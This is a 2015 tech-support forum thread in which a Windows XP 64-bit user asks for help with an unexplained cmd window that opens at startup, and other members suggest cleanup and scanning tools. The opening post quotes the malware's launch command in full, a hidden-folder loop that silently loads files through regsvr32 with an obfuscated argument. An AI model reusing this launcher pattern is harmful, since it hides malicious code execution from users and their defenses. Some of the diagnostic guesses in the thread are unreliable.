Unknown causing cmd.exe to launch with suspicious cmd call

Get your PC tech problems solved here. Quick response time.

Moderator: The Mod Squad

Unknown causing cmd.exe to launch with suspicious cmd call

Postby joe_devore » Sat Jan 10, 2015 9:24 pm

starting just idk last night the day before....

I found this odd cmd window poping up on load of my desktop..... O_o :?
i tried Google-ing it to no avail..


I checked CCleaner, Spybot, and the run regedit keys and Autoruns (System Internals) could NOT find ANY AutoStart reference ANYWHERE ;>_<; O_o

Code: Select all
C:\WINDOWS\system32\cmd.exe  /K for  /F %i in ('dir /b /a:h-d /w "C:\Documents and Settings\All Users\Application Data\1837308050\*"') do start /b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"


I had Process Monitor (by System Internals) do a bootlog ^_^ haha

UNKNOWN_cmd_start_.txt__ProcessMonitor-Logfile__short.PML
is a short logged pre-filtered looking for "1837308050"

and an exported xml file...

the pml file is easier to read but you will need Process Monitor to open/read it.
now I could attach an archive with them in it or I could just post the links for the download page at System Internals home website..
http://technet.microsoft.com/en-us/sysinternals/bb896645
note the 64bit version of Process Explorer and Process Monitor are held internally to ones you will download from their home site...
if your system is 64bit it will auto extract the 64bit exe to the temp folder so just grab a copy from there to have your own permanent copy of it.




ps:
its possible I deleted that #'ed folder finding its existence suspicious and the files found there were not associated with any known program I use......

since I cannot upload a text file (<<-- REALLY? GIVe me a break a txt file?! :roll: )

I have attached a rar archive containing a text file with the cmd string as well as the Process Monitor log files.
Attachments
UNKNOWN_cmd_atempting to run_.rar
Text file with cmd string and Process Monitor Log files.
(111.69 KiB) Downloaded 36 times
joe_devore
Green Belt
Green Belt
 
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby Mr T » Sun Jan 11, 2015 3:44 am

1837308050
Looks like some malware or fragment thereof. Run CCleaner and clear your temp folders. Also clear your browser (s) cache. Run disk cleanup from the hard drive properties. Download and install free Malwarebytes antimalware, update it. Boot into SAFE MODE and run Malwarebytes. It can throw up things not thrown up in normal mode.
I have been programming on computers since the ZX81.
I am an apprentice trained Electronics Engineer with qualifications to back it up.
I have been repairing computers since 1996.
Yet to some people I still know nothing...
Mr T
Enlightened Master
Enlightened Master
 
Posts: 17087
Joined: Fri Jun 14, 2002 1:03 am
Location: England

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby Karlsweldt » Sun Jan 11, 2015 7:04 am

If some unknown program or process is not desired in the Registry, Hijack This should note it. Do only a "scan".
A Windows feature called msconfig can be used from the 'run' prompt. All the system "vitals" are listed there.. tools, configurations, processes, programs for auto-start and manual launch. Go with 'selective start' if wanting to disable certain features or programs.. but use caution with some processes, or the system may not be stable.
Do as Mr T recommends.. but disable the 'restore' feature of Windows before doing so. If not done, Windows may undo all your efforts on the next normal boot! After ensuring all is good, then reactivate the 'restore' feature.
F@H.. to solve mankind's maladies.. in our lifetimes!
Karlsweldt
Mobo-fu Master
Mobo-fu Master
 
Posts: 20663
Joined: Wed Nov 12, 2003 11:57 am
Location: 07438

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby joe_devore » Sun Jan 11, 2015 4:48 pm

I always keep a clean machine, I already got rig of any files in that directory ( I ended up with something one time when I forgot to enable the direct download link on Source Forge (its down-loaders are pushing unwanted garbage)...

anyways I immediately stopped it and cleaned it out I like Spybot S&D =D.... this might be something else...



So I reinstalled some of my drivers (all but the mobo drivers) again in-case I had broke something.. no apparently not that either....
I have preformed manual search of the registry, and used AutoRuns it cant seem to find a entry point

TDSSKiller SCANNED boot records that IS CLEAN too...! so its not loading from there.....
I keep a copy of "Kaspersky Rescue Disk" on hand just OI don't have any burnable cds right now... :(


ho ho ho I found something....

Uninstall C:\WINDOWS\system32\tscupgrd.exe
claims to be a m$ file but is not digitally signed..
v5.2.3790.1830 (srv03_sp1_rtm.050324-1447)
Setup Custom Action Dll
© Microsoft Corporation. All rights reserved.
custom.dll

all three entries were in RunOnce folders, 1st one was in the users_default and the other two entries were in two different user account...
perhaps remnants....

I have just removed them, (found them thx to Spybot S&D's autostart..) reboot see ya on the other side!
Attachments
UNKNOWN_cmd_start_Possible found.txt.rar
(448 Bytes) Downloaded 37 times
joe_devore
Green Belt
Green Belt
 
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby Karlsweldt » Sun Jan 11, 2015 5:15 pm

A lot of confusing reference links for that "tscupgrd.exe".
It is a Setup Custom Action Dll file. Supposed to be in the WINDOWS\system32 folder.
If anywhere else, may not be authentic. It could have been installed by Windows during setup, or by another program.
Some links note it is part of an executable process for Windows programming.
Some links note it as possibly a virus version.
Some links note it should be removed. Some not.
Some links note it is not harmful to the OS. Some do.
The description in this link may be of interest.. http://www.file.net/process/tscupgrd.exe.html
F@H.. to solve mankind's maladies.. in our lifetimes!
Karlsweldt
Mobo-fu Master
Mobo-fu Master
 
Posts: 20663
Joined: Wed Nov 12, 2003 11:57 am
Location: 07438

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby joe_devore » Sun Jan 11, 2015 5:53 pm

nope that didn't stop the cmd from loading.... with that cmd line string.....


sfc /scannow didn't report anything either...
its useless comparing only to the older originals on the PS cd...
joe_devore
Green Belt
Green Belt
 
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby evasive » Mon Jan 12, 2015 3:03 am

You seem to have an infection called FarBar. Let me check on how to get it out properly.
We hate rut, but we fear change.
********************************
System error, strike any user to continue...
evasive
Mobo-fu Master
Mobo-fu Master
 
Posts: 37389
Joined: Sun May 06, 2001 12:01 am
Location: Netherlands

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby evasive » Mon Jan 12, 2015 4:17 am

We hate rut, but we fear change.
********************************
System error, strike any user to continue...
evasive
Mobo-fu Master
Mobo-fu Master
 
Posts: 37389
Joined: Sun May 06, 2001 12:01 am
Location: Netherlands

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby joe_devore » Mon Jan 12, 2015 6:21 am

evasive wrote:You seem to have an infection called FarBar. Let me check on how to get it out properly.

Eyy Evasive =D thx..

I attached the scanner results.... it did not generate a fix file so it does not appear to be the FarBar....

plus I included a SysInfo report as well as a Speccy Report..

I have Daemon-tools Lite and SPTD installed among other programs which if not caused me problems...

as far as plugins and etx for IE all are disabled except for the Spybot plugin but then again I I never use IE, except for getting windows updates in the past...
FireFox FOREVER ^_^ and my ext and plugin lists are clean except for the plugins I use every single day for years, without issue


I did a quick scan of the C: for loose .JS and .vb scripts didn't find anything suspicious at a glance...
other then some Mozilla jvm .js files in a few extracted temp folders...
Attachments
Firefox_Extennsions-List.png
Firefox_Extennsions-List.png (188.5 KiB) Viewed 761 times
Farbar Recovery Scan Tool__Scan Results (no fix list)....rar
archive includes Farbar Recovery Scan, MSInfo report and Speccy Report....
(84.44 KiB) Downloaded 40 times
joe_devore
Green Belt
Green Belt
 
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Re: Unknown causing cmd.exe to launch with suspicious cmd c

Postby joe_devore » Mon Jan 12, 2015 6:29 am

I have noticed something else odd

C:\WINDOWS\Debug\UserMode\ChkAcc.log

I don't remember this before...
but I was using Windows XP Pro SP3 32bit for the longest time....
since WinXP-Pro-64bit is based on Windows Server 2003... its only natural its doing things different
same with the security tab in MS Event Viewer ( I like the XP version its B.E.T.T.E.R. then the Win7 on and not as complicated)
its showing a a lot more activity same reason as above (WinServer2k3) I guess... that is I don't recall seeing anything suspicious...

going to do a reboot now have /bootlog enabled... to try and catch this...
joe_devore
Green Belt
Green Belt
 
Posts: 209
Joined: Tue Apr 15, 2003 12:56 pm
Location: Dover, NH USA

Next

Return to Tech Support

Who is online

Users browsing this forum: No registered users and 5 guests